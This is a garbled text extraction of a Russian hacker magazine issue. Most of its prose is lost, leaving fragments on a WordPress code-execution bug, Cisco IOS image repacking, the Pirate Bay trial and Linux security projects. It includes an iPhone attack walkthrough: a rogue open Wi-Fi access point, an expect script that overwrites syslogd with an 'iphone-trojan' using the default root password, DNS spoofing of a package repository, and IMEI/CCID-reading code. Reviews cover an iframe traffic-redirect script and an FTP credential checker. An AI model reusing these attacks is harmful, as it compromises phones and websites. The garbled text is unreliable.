2. $message stripslashes create_function(),

:
{
echo '<div class='error'><p>';phpinfo();'</p></div>';
}
, code exec.
. ,
admin, , ,
author/editor.

WordPress,
:). . ,
, . , SEO.

, :
.z
X 04 /124/ 09
057
>>
SHADOS
/ SHADOS@MAIL.RU/
CISCO

, !
( ) Cisco, .
, . -
>>
.
. : Cisco 2611
Ethernet-, 64 RAM 16
Flash. , (
DRAM flash
-
).
Cisco IOS Feature Navigator (tools.
cisco.com/ITDIT/CFN/jsp/index.jsp), IOS
12.3(26)
(End-of-Sale
2003, End-of-Life 2008).
,

12.4 ( 12.4T). ,
:
Cisco

, ,
2600 , ,
2611XM.
:
flash-
48 MB ( 2611 16 MB)
SDRAM-
128 MB ( 2611 64 MB)
10/100 Fast
Ethernet ( 2611 10 /c
Ethernet)
058
Cisco IOS Feature Navigator

, IOS
12.4(23). IOS 12.4(21)
Enterprise Base Advanced
Security 128 MB DRAM 32 MB
flash. , 128 MB ,
,
.
,
.
.
EXTENDED,

Cisco IOS 12.4(21)
Enterprise Base
2611
, .

, 10- ,
, , in production.

- PIX (, ,
10 ),
,
IOS 12.4,
12.3?
Cisco IOS Feature Navigator (tools.
cisco.com/ITDIT/CFN/Dispatch).
, ,
, .
,

(just for fun).

, .
DRAM . ,
,
. ,
core -
. ,

IOS 12.4 ,
16 B. :
c2600-entbasek9-mz.124-9.
T1.bin ,
16,4 MB, 17 257 364 .
no-squeezereserve-space ( erase /no-squeezereserve-space flash:), .
, , c2600-ik9o3s3mz.123-13.bin (
,

, ).
? !
tftp, ,
, .
, (,
).
Dynamips.
?
X 04 /124/ 09
>>
Advanced Enterprise Services

Advanced IP + Enterprise + Cisco IOS Firewall
Enterprice Services
Advanced IP Services
IS-IS, MPLS, L2/L3 VPNs, IPv6***,
Mobile Support, IP SLAs, etc.
>> IOS

IPv6***, IS-IS, IP SLAs, IBM Services,

L3 Routed Protocols, etc.
IP Services
EIGRP, OSPF, BGP, GLBP, QoS, High Availability, NAT, nBAR,
VRF-lite, Multicast, Virtual Switching System, etc.
** EIGRP-STUB in IP Base will be available on the Cisco Catalyst 4500 Series (Sup4)
and the Cisco Catalyst 6500 Series.
*** Starting with 12.2(33)SXI on the 6500 series, Cisco is offering packaging
parity for IPv6 feature support for a technology will be packeged in the same
feature set as IPv4. This parity will be expended to other platforms in the future.
IP Base
RIP, HSRP/VRRP, StackWise, GRE, EIGRP STUB**, WCCP, etc.
LAN Base
ACL, QoS, Enhanced 802.1x, AutoQoS, AutoSecure, etc.
Layer 2 Base
Basic Ethernet L2. 802, tx. 802. ts. 802.w.
Ether Chanel, 802. 1d, Port Security. SmartPorts, SSH, etc.
. How to use?
(www.ipflow.utc.fr/index.php/Cisco_7200_
Simulator), , :
<skipped>
To boot quickly, the preferred method is to decompress
the IOS image with the unzip utility. It avoids to run
the self-decompressing process in the emulator.
chris@portchris2:~/dynamips-0.2.5$ unzip -p c7200advipservicesk9-mz.124-9.T.bin > image.bin
warning [c7200-advipservicesk9-mz.124-9.T.bin]: 27904
extra bytes at beginning or within zipfile
(attempting to process anyway)
chris@portchris2:~/dynamips-0.2.5$ file image.bin
image.bin: ELF 32-bit MSB executable, cisco 7200,
version 1 (SYSV), statically linked, stripped
You can ignore the warning, unzip has just skipped the
self-decompressing code at the beginning of the image.
Now, you can boot the imag
<skipped>
r
l
z
x
- The image runs from ROM

- The image is relocatable
- The image is zip compressed
-The image is mzip compressed
mz
zip-.
(WinZIP, WinRAR, 7zip) .
, . , deflate .
, :
7-zip 4.65 :
zip

Deflate
32B
258
: 15,7 MB (16 489 764 bytes). WinZIP

11.2 Deflate
16,0 MB (16 803 634 bytes). WinRAR 3.80,
zip : 16,3 MB (17131 353 bytes).
PKZIP 9.00 , Deflate
16,3 MB (17 094
474 bytes).

, , 7zip.
ELF HEX-
,
,
.
,
( 32-
PowerPC ),
.
, .
: Cisco IOS Configuration
Fundamentals Configuration Guide, Release 12.4 Loading and Managing
System Images, Image Naming Conventions.
:
f - The image runs from flash memory
m - The image runs from RAM
X 04 /124/ 09
059
>>
( )
.
,
WinHex, HT Editor hview. WinHex, HT, .
, IOS, ,
, ELF (Executable
and Linkable Formate). ELF-
*nix-like , .
ELF- ,
1.2, , , libc elf.h. ELF-
:
ELF Header
Program Header Table (optional)
Section 1
Section 2
Section n
Section Header Table
( ),
.
MS Windows, readelf binutils.
HT (hte.sf.net),
ELF. c2600-entbasek9mz.124-9.T1.bin, HT , .
elf.h. , ELF-,
:
typedef struct
Elf_Char
Elf32_Half
Elf32_Half
Elf32_Word
Elf32_Addr
Elf32_Off
Elf32_Off
Elf32_Word
Elf32_Half
060
{
e_ident[EI_NIDENT];
e_type;
e_machine;
e_version;
e_entry;
e_phoff;
e_shoff;
e_flags;
e_ehsize;
Elf32_Half
Elf32_Half
Elf32_Half
Elf32_Half
Elf32_Half
} Elf32_Ehdr;
e_phentsize;
e_phnum;
e_shentsize;
e_shnum;
e_shstrndx;
e_machine 0x002b 43,

SPARC v9:
#define EM_SPARCV9 43 /* SPARC v9 64-bit */
, 2611
Motorolla MPC860, , 0x0014,
:
#define EM_PPC 20 /* PowerPC */
, .
. F6 elf/header. :
-
elf header size 0x34

program header entry
program header count
section header entry
section header count
size 0x20
1
size 0x28
6
, , 52+32+6*40=324 0x144, ,
6 (, 6 ) 1 . ,
IOS.
(, ),
. ,
<F6> elf/section headers,
:
typedef struct
Elf32_Word
Elf32_Word
Elf32_Word
Elf32_Addr
Elf32_Off
Elf32_Word
Elf32_Word
Elf32_Word
Elf32_Word
Elf32_Word
} Elf32_Shdr;
{
sh_name;
sh_type;
sh_flags;
sh_addr;
sh_offset;
sh_size;
sh_link;
sh_info;
sh_addralign;
sh_entsize;
X 04 /124/ 09
>>
HT
flash
sh_type .
, ,
SHT_PROGBITS, ,
. ,
, 0x00000007 ( - ). ()
(SHT_NULL).
, , . , ( sh_size).
, 0x1070e7c 17239676 .
hex- (<F6> hex) (
sh_offset) <F5>.
? ,
PK, , PKZIP-
(pkware.com/documents/casestudies/APPNOTE.TXT), 0x04034b50
? ,
22 . , ,
0xFEEDFACE
0x02AED904. , Cisco Networks Hacking Exposed McGraw
Hill/Osborne.
Andrew A. Vladimirov, Konstantin V. Gavrilenko,
Janis N. Vizulis and Andrei A. Mikhailovsky 2006 IOS 12.3(6).
, 0xFEEDFACE
uncompressed image size, compressed image
size, compressed image checksum, uncompressed image checksum.
,
. ,
, , , , ,
:
Error : compressed image checksum is incorrect
0xB99D8823
Expected a checksum of 0xF6F69877
*** System received a Software forced crash ***
signal= 0x17, code= 0x5, context= 0x800805f0
PC = 0x0, Vector = 0x0, SP = 0x0
( )
.
, zip-, 20 ,
0xFEEDFACE zip ( ,
0x44F8 0x1075360 + 0x44F8). 0x44F8 .
.
X 04 /124/ 09
FEEDFACE
(5), IOS, ,
0x1070e7c 17239676 ( 20 0xFEEDFACE 0x504B0304).
, , 0xFB9D38 16489784
( 20 ).
0xB7158 749912. , , ,
0x1075360 0xFBE208!
0xFEEDFACE:
unpacked image size: 0x02AED904 45013252
packed image size: 0x01070E66 17239654 ( 5 - 22 )
packed image checksum: 0xB58BE139
unpacked image checksum: 0xA29D4F6E
: 0x504B0304
0xFEEDFACE:
unpacked image size: 0x02AED904 ( )
packed image size: 0x00FB9D22 16489762 ( 5 - 22 )
packed image checksum:
- , 0x48000000
unpacked image checksum: 0xA29D4F6E ( )
, , .
,
. 16,4
MB (17257364 bytes) 15,7 MB (16507472 bytes).
, , 749912 .
, flash, , ,
/no-squeeze-reserve-space.
flash,
. ,
, . -
061
>>
rommon
<Ctrl+Break>. tftp
RAM:
Head Total(b) Used(b) Free(b) Lowest(b) Largest(b)

Processor 82A44240 20244772 8718640 11526132 10171028
10098348
I/O 3CA3400 3525632 1650536 1875096 1875096 1875068
rommon 1>tftpdnld -r
<skiped>
:
router#show flash:
TFTP flash copy: Error, image size (16507470) mismatches
netsize (16507472).
, 5 2
( 20 0xFEEDFACE + 2).
,
0xB0257B0D:
Error : compressed image checksum is incorrect
0xB99D8823
Expected a checksum of 0x48000000
*** System received a Software forced crash ***
signal= 0x17, code= 0x5, context= 0x800805f0
PC = 0x0, Vector = 0x0, SP = 0x0
0xFEEDFACE (
HT <F3>, <F5> <F4>, <F2>). .
rommon 4>reset -s
, IOS
.

c2600advsecurityk9-mz.124-21.bin. , 128- 7zip,
15947076 ( 16635336),
flash. ,
RAM :
router#show version
Cisco IOS Software, C2600 Software (C2600ADVSECURITYK9-M), Version 12.4(21), RELEASE SOFTWARE
(fc1)
<skiped>
router#show memory summary
062
62
System flash directory:

File Length Name/status
1 15947076 c2600-advsecurityk9-mz.124-21-shad-pk.bin
[15947140 bytes used, 830072 available, 16777212 total]
16384K bytes of processor board System flash (Read/
Write)
. :
router#verify flash:c2600-advsecurityk9-mz.124-21shad-pk.bin
, , Embedded hash
Calculated hash . 16
.
:
,
:
Embedded Hash MD5 : 3DD2C6591FF4F033425147DE4540F9CD
Computed Hash MD5 : 3DD2C6591FF4F033425147DE4540F9CD
CCO Hash MD5 : 79020945BDFE2A354E012C8303136360
Embedded hash verification successful.
File system hash verification successful.

. ,
:
1) PKZIP;
2) ELF;
3) Cisco IOS;
4) rommon .
, .
IDA, *nix-like ,
, , . A
. , , , ,
, .
. ... . z
X 04 /124/ 09

2100 . ( 15%
)
. ,

!
!

+ + DVD:
- 155 ( 25% , )
12
3720
2100
+DVD 6
1200 .
1. ,
, www.
glc.ru.
2. .
3.
:
subscribe@glc.ru;
8 (495) 780-88-24;
119021, ,
. , . 11, . 44,
, .
:

;
20
.
,
.
, . ,
, .
, , 8(495)780-88-29 ( )
8(800)200-3-999 ( , , ).
info@glc.ru www.GLC.ru
>>
D0ZNP
/ HTTP://OXOD.RU /
iPhone
APPLE IPHONE
, , Apple iPhone. ,
, , .
>>
. iPhone, , .
,
. ( , ),
Win- , Nix .
, Microsoft.
: ,
( )
.
- Amoi MD-1 ( , )?
Apple iPhone !
064
.
iPhone,
, . 26
120.000 3g. ,
, 250.000 . - 370.000. , , ,
, .
3 . , ...
5-10
.
X 04 /124/ 09
>>
GND
GND GND
10k
R7
C10
8
7
6
5
GND
D1
US 3
IRFZ44N
22
GND GND
1000uF
1000uF
2k2
O1
BC 547
47k
GND
3
4
COMREF
VFB VCC
ILIM OUT
OSCGND
GND GND
R3
10k
100nF
1
2
PAD3
C7
R4
120H
D1
R5
220k
1k
R2
R6
100nF
O2
BC 547
1000uF
4
GND GND
100nF
C11
L2
PAD4
GND
1000uF
C6
PS3
on Temte
PAD2
PS4
120H
O3
PS1 13:13 PS2
O2
1 L1
1000uF
PAD1
Power out to PC
1000uF
2
Power in from car
22nF
GND
GND
GND
10k
C9
R9
1nf
GND
GND
12

?
.
,
.
SMS. , , !

,
? ,
, , .
, , .
- iPhone
.
:
(, 10- )
(150 !)
( )
(
PCMCIA
)
(~2000 ~8000 .
)
,
, .
SSH
, - .
, ARM
200 . USB ,
,
. Asus WL-500G,
, .
X 04 /124/ 09
: http://wiki.openwrt.org/
CompleteTableOfHardware.

, !

. :
- , (oxod.
ru). :
, , ,
. , !
.
.
openwrt, dd-wrt , .
openwrt ,
, , GPL.
, toolchain, ..
-,
. - : expect,
ssh client, sshd, http-, dns-.
openwrt, , :
http://downloads.openwrt.org/kamikaze/8.09/brcm-2.4/openwrt-brcm2.4-squashfs.trx. 15 2009 , .
Failure Mode.
, Reset .
Reset, , . Failure Mode
,
WIKI openwrt . .
- , : ping
192.168.1.1. ,
. tftp-, :
http://www.tftp-server.com/tftp-download.html Windows;
http://packages.debian.org/lenny/tftp Debian stable.
065
>>
- 12 -220 .
300
Asus WL-500G Deluxe
:
tftp 192.168.1.1
tftp> binary
tftp> trace
tftp> put openwrt-brcm-2.4-squashfs.trx
links
openwrt.org

linux
.
dd-wrt.com linux
.
code.google.
com/p/winchain
iPhone
Windows.
oxod.ru
.
. ,
.
,
( ROM). ,
,
. .
:
#~telnet 192.168.1.1
#~passwd //
#~exit //
#~ssh root@192.168.1.1 // .
SSH-

#~ipkg update //
, .
/etc/config/network.
PPPoE, :
config interface wan
option ifname
option proto
option username
option password
warning
!
! ,

!
066
nas0
pppoe
"username"
"password"
.
DHCP-, SSH- SSH-.
.
.

iPhone . ,
.. ,
SSID,
. ,
WiFi-.

, .
,

DNS ( -
!).
, ,
,
. MAC SSID, -.
,
, ,
. /etc/config/
wireless :
config wifi-device
wl0
option type
broadcom
option channel 5
option disabled 0
config wifi-iface
option device wl0
option network lan
option mode
ap
option ssid
Free_Internet
option hidden 0
option encryption none
DHCP-.

:).
config dhcp
option interface
lan
option start
2 //
IP-, 10.0.0.2
option limit
100 //

option leasetime
1h //
,
config dhcp
option interface
wan
option ignore 1
, http://wiki.openwrt.org/
OpenWrtDocs/KamikazeConfiguration (
).
. SSH

iPhone , SSHD.
, toolchain openwrt
expect. ,
X 04 /124/ 09
>>
- . ,
.
:
ipkg
ipkg
ipkg
ipkg
ipkg
install
install
install
install
install
buildroot
make
tcl
scponly
openssh-client
/etc/ssh/ssh_config,
StrictHostKeyChecking no, SSH-

. expect : http://expect.nist.gov/expect.tar.gz.
, : ./configure,
make, make install.
: setenv TCL_LIBRARY /usr/
bin/tcl8.4.19/Library. ,

-. - :
#!/usr/bin/expect
spawn scp /www/iphone-trojan root@10.0.0.2:/
usr/sbin/syslogd
expect assword {send alpine\r}
spawn ssh root@10.0.0.2
expect assword {send alpine\r}
send ldid S /usr/sbin/syslogd\r
send exit\r
expect eof

iphone-trojan, .
, .
dhcp ,
IP.
nmap ,
iPhone.
X 04 /124/ 09
nmap O2 10.0.0.. , nmap

,
. .
. INSTALLER
.
, DNS-
Installer. , ,
, > 50% iPhone . :
, Installer .
.
. DNS-:
dvd

SMS.
#~ipkg install maradns
IP i.ripdev.com
. /etc/mararc /etc/marands/
ripdev.com:
/etc/mararc:
ipv4_bind_addresses = "127.0.0.1, 10.0.0.1"
chroot_dir = "/etc/maradns" //,
, , ,

recursive_acl = "127.0.0.1/8, 10.0.0.0/24" //

zone_transfer_acl = "127.0.0.1/8,
10.0.0.0/24" //
timeout_seconds = 2
csv1 = {}
csv1["ripdev.com."] = "ripdev.com"
dns_port = 53
maximum_cache_elements = 1024
min_ttl_cname = 900
/etc/maradns/ripdev.com:
067
>>
# SOA
Sripdev.com.|86400|%|root@%|200903211634|7200|3600|
604800|1800
# NS
Nripdev.com.|86400|ns.ripdev.com.
#A
Ai.ripdev.com.|86400|10.0.0.1
.
-
. - /www,
h /
my/www-root. - . , :
http://i.ripdev.com/info/index-2.0.plist
, Installer,
date version . , ,
. IP-.

z. :
http://i.ripdev.com/info/com.ripdev.install-4.12.0.plist
version ,
. size hash. md5
,
.
(
/www/info /www/packages/System), .
. IPHONE
?
sms ( ). ?
iPhone.
xcode Apple SDK, gcc.
Cydia. :
http://code.google.com/p/iphone-dev/wiki/Building
http://code.google.com/p/winchain/
SMS AT /dev/tty.debug.

iPhone/iPhone 3g.
, ! code.google.
com . :
( DVD):
int InitConn(int speed)
{
int fd = open("/dev/tty.debug", O_RDWR | O_NOCTTY);
if(fd == -1) {
fprintf(stderr, "%i(%s)\n", errno, strerror(errno));
exit(1);
}
ioctl(fd, TIOCEXCL);
fcntl(fd, F_SETFL, 0);
...
return fd;
}
void CloseConn(int fd)
{
tcdrain(fd);
tcsetattr(fd, TCSANOW, &gOriginalTTYAttrs);
close(fd);
}
void SendCmd(int fd, void *buf, size_t size)
{
if(write(fd, buf, size) == -1) {
fprintf(stderr, "SendCmd error. %s\n",
strerror(errno));
exit(1);
}
}
.
, IMEI CCID.
.
AT . ReadResp
, IMEI CCID message. :
http://code.google.com/p/iphone-sms
InitConn
, CloseConn , SendCmd AT ReadResp .
068
if (strstr(readbuf,"+CMGW:")!=NULL) {
smsIndex = atoi(&readbuf[strlen(message)+10]);
}
else if (strstr(readbuf,"+CCID:")!=NULL) {
X 04 /124/ 09
>>
, , JTAG.
strncpy(message, &readbuf[17], 20);

}
else if (strstr(readbuf,"AT+CGSN")!=NULL) {
UCHAR temp[15];
strncpy(temp, &readbuf[10], 15);
sprintf(message,"%s-%s",message,temp);
}
main ,
. CCID,
IMEI, .
,
. , ,
. 14
, ,
802.11g. ,
. , ,
? SMS, ? , , ,
. ,
. . ,

ldid. Cydia. ,
(
).
,
. ,
, .
:
.
-
12 , 1 .
12 ,
8 16 . ,
. :
rlocman.ru/shem/schematics.html?di=33999
X 04 /124/ 09

,
. GPS-, 12
, 1 - .
12/220
( 50 ). ,
. :
12 4.8 / ,
1 . , , . , ,
5 .
+ -,
.
, . , ,
.

. , ,
, .
,
, GPS-.
. ,
! ,
,
Apple iPhone . ,
, DDoS-
-.
iPhone. ,
,
-, ,
... - ,
. z
info

, : , ,
,
,
.

z 2009

. .
069
>>
R0ID
/ R0ID@BK.RU /
>>

:WEBSMSENDER
: WINDOWS 2000/XP
:CYLAAAAN
SMS-
, :
1. -

2.
: www.
websms.ru ,
3.
-
sms-
sms-
. ,
,
- ( ).

Websmsender. - www.websms.ru.
,
sms-,
. , :
1. sms-
2.
3.
4.
5.
sms (,
).
, : 10 1 SMS
1.4 , 1 3
SMS 1.3 ..
,
,
.
70
,
: ,
, ,
SMS.
2-3 ,
:).
, sms-
, , -?
P.S. , sms- ,
.
: CHARON
: WINDOWS 2000/XP
: RHINO
/ - (,
). - ,
.
X-Tools , /
. , Charon.
,
,
, .
,

. :

( //etc)
IP- ( ///etc)
/
-
-
AngryIPScanner
Superscanner
-
RBL (Realtime Blackhole List)
-
(http/ssl/socks4/5)

-

-
GeoIP,
,

( thx to v1ru$, .
)
P.S. DVD.
: FTP-CHECK TOOLZ
: *NIX/WIN
: JENIZIX
FTP-,
.
: ftp-check toolz.

- .
, , :
FTP-
index-,
X 04 /124/ 09
>>
: [XDS] TDS
: *NIX/WIN
: XADDIS
-

,
iframe-
-

( )

(

)
, :
1. FTP_valid.txt
2. FTP_invalid.txt
3. FTP_defaced.txt
4. FTP_unknown.txt
5. FTP_info.txt ,

- /:
ftp://login:pass@server
login:pass@server
PHP 4
, chmod 777 ,
.
, ,
1-2 .

.
: GUARDMOBILE
: WINDOWS MOBILE 5/6
:MASPWARE

?
GuardMobile
Windows Mobile
, .
, :
(/)

( GPS-)
-

(
)
X 04 /124/ 09
.
PIN- ,
.

,
- .
:

.

-

GPS-
/
( )

-/-
SIM-

,
, .

.
,
:
locate :
lock :
unlock :
keylock :
alarmon :

alarmoff :
callback :
softreset/hardreset : , ,
:)
:
#PIN#.
,
:).

( z).
[XDS] TDS.
PHP,
.
:

777
config.php
:
### ###
$usersdir='users';
### ###
$clickf='clicks.txt';
### ###
$unicf='unics.txt';
### ###
$blockf='blocked';
### ###
$startf='start.txt';
###
###
$prevf='previous.txt';
### ###
$redf='redir.txt';
###
### $host='http://www.site.com';
### ###
# $hostn='http://www.sites.com';
### ###
$passw='123';

:

iframe.php
stat.php
, , .
.z
71
>>
MIFRILL
/ MIFRILL@RIDDICK.RU /
- BITTORRENT

The Pirate Bay
, .
XXI , , , ,
. , . - , ThePirateBay.org , , . ,
.

,
,

.
,

ThePirateBay.org TPB,
- . -
, ,
,
.
-
, 2004-
. TPB
.
,
:
(Gottfrid Svartholm aka
anakata), (Fredrik Neij aka
() ()
,

.
2003
Piratbyran ( ).
, . , ,
072
. 2006-
,

.

, , TPB, .
, ,
. ,

- -
TiAMO) (Peter
Sunde Kolmisoppi aka brokep). -

48-
(Carl Lundstrom).

( , ). ,
TPB
,
.
:
DDoS-
, ,
. , -
, - .
,
,
X 04 /124/ 09
>>

.
, 2006-,
, (,
).
,
. , ,
-, ,
, ,
. .
,
,
p2p-. , ,
(,
Napster, Audiogalaxy KaZaA ).
BitTorrent
, -.

, , ,
, TPB .

,

.
e-mail , ,
.
,

,

.
,
-
: 2008
TPB 3
,
25 ,
Alexa Internet 107 .
TPB .

Microsoft, Apple, SEGA, DreamWorks, Warner
Bros ,
.
,
. ,

thepiratebay.org/legal, ,
. X 04 /124/ 09
! TPB
31
2008, ,
.
?, Warner Bros., MGM Pictures,
Columbia Pictures, 20th Century Fox Sony BMG

, , .

,

,

$188.000.
, ,
14 .

.
,
,
,
.
The Pirate Bay, , . -,

. ,
Spectrial (
spectacle trial -).

:).

. , :
,
.
, .
.
:
, .
.
.
,
,
, .
,

,
TPB.
073
>>
: -
, 16- ,
, ,
,

: All your
base are belong to bus.
-, - .
,
,
,
$60.
,

-
.
,
. twitter.com
#spectrial,
, TPB
.
,
,
, ,
. The Pirate Bay
,
.
, IFPI
( )
,
,
.
:
, , , - .

,

. ,
,
, -
TPB,
trial.thepiratebay.org,
,
.
15
The Pirate Bay ,

, .torrent-
TPB.
,
DHT,
.
, ,
. IFPI, ,
, .
,
,
,
, ,

. -
,
, ,
DHT,
.
.

: EPIC
WINNING LOL.
IFPI , ,
, , ,
?
4 , 9 22 .
The Pirate Bay
:
IFPI (
):
Sony BMG Music Entertainment
Sweden AB,
Universal Music AB,
Playground Music Scandinavia AB,
Bonnier Amigo Music Group AB,
074
EMI Music Sweden AB,

Warner Bros. Music Sweden AB;
Antipiratbyran (
):
Yellow Bird Films AB,
Nordisk Film,
Henrik Danstrup;
MAQS Law Firm Advokatbyra KB:
Warner Bros. Entertainment Inc,
MGM Pictures Inc,
Columbia Pictures Industries Inc,
20th Century Fox Films Co,
Mars Media Beteiligungs GmbH &
Co Filmproduktions,
Blizzard Entertainment Inc,
Sierra Entertainment Inc,
Activision Publishing Inc.
,
:
Prison Break ( ,
113)
, :
Kurt Wallander:
Wallander Den svaga punkten
Wallander Afrikanen
Wallander Mastermind
Pusher III

, :
Call of Duty 2
Diablo II
F.E.A.R.
World of Warcraft
X 04 /124/ 09
>>
, TPB
. , ,
, (global distribution license).
, IFPI, , Beatles Let it Be
,
. :
.
, Sony
(Svenska Antipiratbyran) , TPB
. , , .
, , , , ,
, ,
.

(Monique Wadsted).

. ,
,
.
, ,
-. ,
.
, -
, () . South park
, ,

? ,
,
. , , ,
, .
: 2000/31/EG
, .
, , The Pirate Bay .
, .
-. ... , ,
, 2006
. : , ,
TPB , ( )
(Xenu) . ,
. ,
75
. ,
, , ,
. , ,
.
,
.
, , , . ,
,
, South Park.
D ( wasted
).
,
, , , . , Google, ,
.torrent- TPB,
. , -

. .
, -, , ,
- .
, , ,
,
TPB, . , ,
,
,
TPB
. , , ,
,
, TPB ,
- . , , .

i , . ,
, , ,
, , ,
. ,
1000 , TPB, 80% -
X 04 /124/ 09
075
>>
, Google,
,
YouTube, .
, .torrent-
The Pirate Bay, .torrent-
FTP .
, .
,
.
? : ,
,
TPB ,
, , ,
, .
,
. , ,
. ,

, . ,
, IFPI

. ,
Brokep.com,
, :
.
, , ,
, , 48 , TPB?
,
, .
: VS

.
- :
?, .
: (Magnus Martensson) IFPI, 15 , (Anders
Nilsson) . ,
, ,
TPB, , ...
. , . , .
: , , DHT Peer
Exchange?
: DHT .
.
: , , ?
: . ,
, - .
: , DHT, , ,
The Pirate Bay ?
: .
,
, . ,
, , . , ,
, TPB
,
.
25- .
076
. :
(John Kennedy), IFPI; (Per
Sundin), Universal Music;
(Bertil Sandgren), (Svenska Filminstitutet) (Ludwig Werner)
IFPI.
, .
, , - , , ,
, . :
, .
,
.
, - The Pirate
Bay, , ,
. : ,
thepiratebay.org (
), : 50% -
- thepiratebay.org.
: , .
, .
. , ( , , )
9- . , ,
.
,
, (Kristoffer Schollin),
, .
,
BitTorrent, ,
- ,
, Intel Blizzard.
, , ,
, .
, Google,
.
,
(Roger Wallis),
. 68 40
X 04 /124/ 09
>>
,
39-
. , :).
6.000
. , ,
.
FINITA LA COMEDIA

,
.
.
,
IT. , ,
, 1969 ,
-.
,
,
. , ,

CD-. , - ,
. , mp3-, ,
, .
.
3- , , ,
. , ,
, , - ( ). ,
mp3- , ,
.
,
. ,
,
, - .
, : .
, , ,
- flowerstorm . ,
,
. ,
.
X 04 /124/ 09
. ,
. TPB .
2006 , 2002. ,
, ,
- - ,
. , , , ,
, , .

, . , , . , ,
TPB
, . ,
. , , ,
,
,
. , ,
, -
.
, ,
, . ,
, ,
, , ,
IFPI.
, 17- 13:00
, .
, , ,
.
,
? , TPB ,
(
, ),
. ,
.
, ,
. , -
, .
, ,
.
TPB, ,
? , ,
,
. ,
. , The Pirate Bay
,
. , , , TPB

. z
077
MAXI Racing
MAXI tuning
Car Audio &
Mobile Media Alpine,
Opel,
MSN.ru
.
MAXI Racing
402 . ,
, .
MAXI Racing!

. , ,
,

, .
,
! (
)
OPC Opel!
.
! ,

Opel Vectra OPC
Zafira OPC . ,
, Opel Cors.

.
,
.

,
,
. ! ,
,
.
.
Alpine,
!
,
,
.
:
, Alpine .
,

, , , . , ,
,
. ,

Alpine!
Alpine AlpineF#1Status.

!
,
,
, 50 000
!

.
? . ,
.
.
(
Alpine MSN.ru), ,
.

, .
, , ,
.
Alpine MSN.ru,
, :

Opel.
: 3
: - . .

, , ,
.
, ,

!

.
.
,
. , ,
Opel
OPC. ,
!
,
.

,
!
! ,

! ,
!
1. Alpine: CD-, ,
, IPod Bluetooth
Alpine.
2. : 50 000 (
)
3. MAXI Tunung:
,
, , ! Opel
Opel Corsa!!!!!
,
Cordiant 15%

Cordiant !
!

.
! ,
!
. !
! , !
! !
, - , MAXI RACING!
, !
>> unixoid
.
50
50
94
40
40
30
30
20
20
10
10
RAM
64
32
0
0
AXFS
JFFS2
CRAMFS
SQUASHFS
Flash
AXFS
SQUASHFS XIP AXFS XIP CRAMFS
JFFS2
SQUASHFS
AXFS
AXFS: (), (), ( RAM/FLASH) ()
J1M
/ ZOBNIN@GMAIL.COM/

, UNIX-
,
UNIX FOSS. IT-
, .
, USENIX Linux
Symposium .
>> unixoid
KORSET HIDS
C C++
. 25 ,
.
NX-, , ,
. ,
shell-, .
. - .
, ,
.

(HIDS).
, :
,
, , .
080
HIDS: .
, HIDS ,
,
. HIDS
, ,
.
HIDS, , -.
,
( ,
..), .
: ,
( - SELinux
Apache ).
HIDS Korset (www.korset.org), Linux Symposium 2008,
HIDS,

. Korset Control Flow Graph
X 04 /124/ 09
>> unixoid
KORSET
User Space
Kernel Space
System Calls
example c
example
i=read(fd, buf, n);

if (i==n) {
write(fd, buf, n);
}
close(fd);
gcc, ld, ...
ELF
executable
Korset
Monitoring
Agent
Korset Static Analyzer
Kernel
System Call
Handler
read
write
close
1)syscall90
2)fwrite()
3)ryscall140
4)syscall91
5)syscall125
6)syscall+5
7) syscall4
8) syscall197
9) syscall10S
10) syscall54
example. korset

FWRITE()
, VX32
Host Operating System

Kernel Address Space
10
9
7
(x86-32 or x86-64)
4
Host Application
Address Space
(x86-32 or x86-64)
AXFS
(quest address space expands

as heap grows)
Flat Model
Code, Data
Segments
SUPERBLOCK
quest heap
quest code, data, bss
Guest
Data
Segment
default quest stack

Guest Address Space
(always x86-32)
quest execution state,

code tragment cache
vx32 sandbox library
Host Application
code, data, bss, heap
(x86-32 or x86-64)
0
X 04 /124/ 09
Region Descriptor
Region Descriptor
0
Guest
Control
Segment
Region Descriptor
Region Descriptor
Region - file names
Region - node offsets
Region - compressed nodes
Region - xip nodes
081
>> unixoid
(CFG), ,
.

.
, ,
.
, Korset GNU
build tools (gcc, ld, as, ar) ,
CFG .
Monitoring Agent ELF, CFG ( .korset).
- security_system_call,
security_operations,
CFG. , ,
task_struct CFG .
, Korset . . -, CFG
,
. -, CFG .
shell- ,
CFG (, open(),
, ), . , -,
Korset : x86,
, ,
setjmp longjmp.
VX32

. : Chroot, FreeBSD Jail, Linux Lguest, Solaris
Zones. JavaVM , - . VMWare
qemu , ,
.
,
x86. , ,
Java, x86-,
gcc.

. API.
. ,
,
- , -,

API .
, .
, .
(
),
, ,
, API (
int call). (jmp)
( ).
. :
.
Vx32 (pdos.csail.mit.edu/~baford/vm),
USENIX08,
,
.
.

, - ,
082
, .
, ,
, .

, . Vx32, ,
(ds, es, ss),
-
. , Vx32
- ( : jmp
, call, int, ret) ,
,
. Vx32 ,
, Plan9, -, Linux (Linux API Vx32).

( 80%). :
x86.
KVMFS

.
,
(HPC)

.
,
.
(

).
(HPC)
(
).

x86-.

, .
Linux kvm,
qemu. qemu
, /, ,
..
qemu , , ,
, .
KvmFS, Linux Symposium 2007,
X 04 /124/ 09
>> unixoid
. KvmFS 9P (,
Plan9) , , Linux,
qemu
. KvmFS
qemu.
host.
org:
#
#
#
#
#
#
#
#
#
#
#
mount -t 9p host.org /mnt/9

cd /mnt/9
tail -f clone &
cd 0
cp ~/disk.img fs/disk.img
cp ~/vmstate fs/vmstate
echo dev hda disk.img > ctl
echo net 0 00:11:22:33:44:55 > ctl
echo power on freeze > ctl
echo loadvm vmstate > ctl
echo unfreeze > ctl
:
#
#
#
#
#
#
#
mount -t 9p host1.org /mnt/9/1

mount -t 9p host2.org /mnt/9/2
tail -f /mnt/9/2/clone &
cd /mnt/9/1/0
echo freeze > ctl
echo 'clone 0 host2.org!7777/0' > ctl
echo power off > ctl
,
,
.
AXFS RAM
Linux
. .
Linux .

,
, . Linux ,
.
( ) , ,
,
.
. , ,
/proc. ? , X Server ,
framebuffer! . ,
,
flash-.
, , :
1. .
flash-
.
2. .
3. ,
.
X 04 /124/ 09
4. .
5. XIP (eXecute-In-Place), .. flash-, .
jffs2
, Nokia ubifs (
2.6.27) , .
XIP . .

NOR, , NAND-,
.

.
NOR- ,
, ,
RAM.
XIP , . ,
.
AXFS (Advanced XIP File System),
Linux Symposium 2008,
. 2.6.13, dcss- s390,
, flash-
( /mm/filemap_xip.c). AXFS xip- cramfs,
, . AXFS
64- ,
:
1. XIP NOR-.
2. NAND- (XIP ).
3. 4 4 .
4. , .
( ), ,
.
LIBFERRIS

. ,
. ,
API RPC.
,
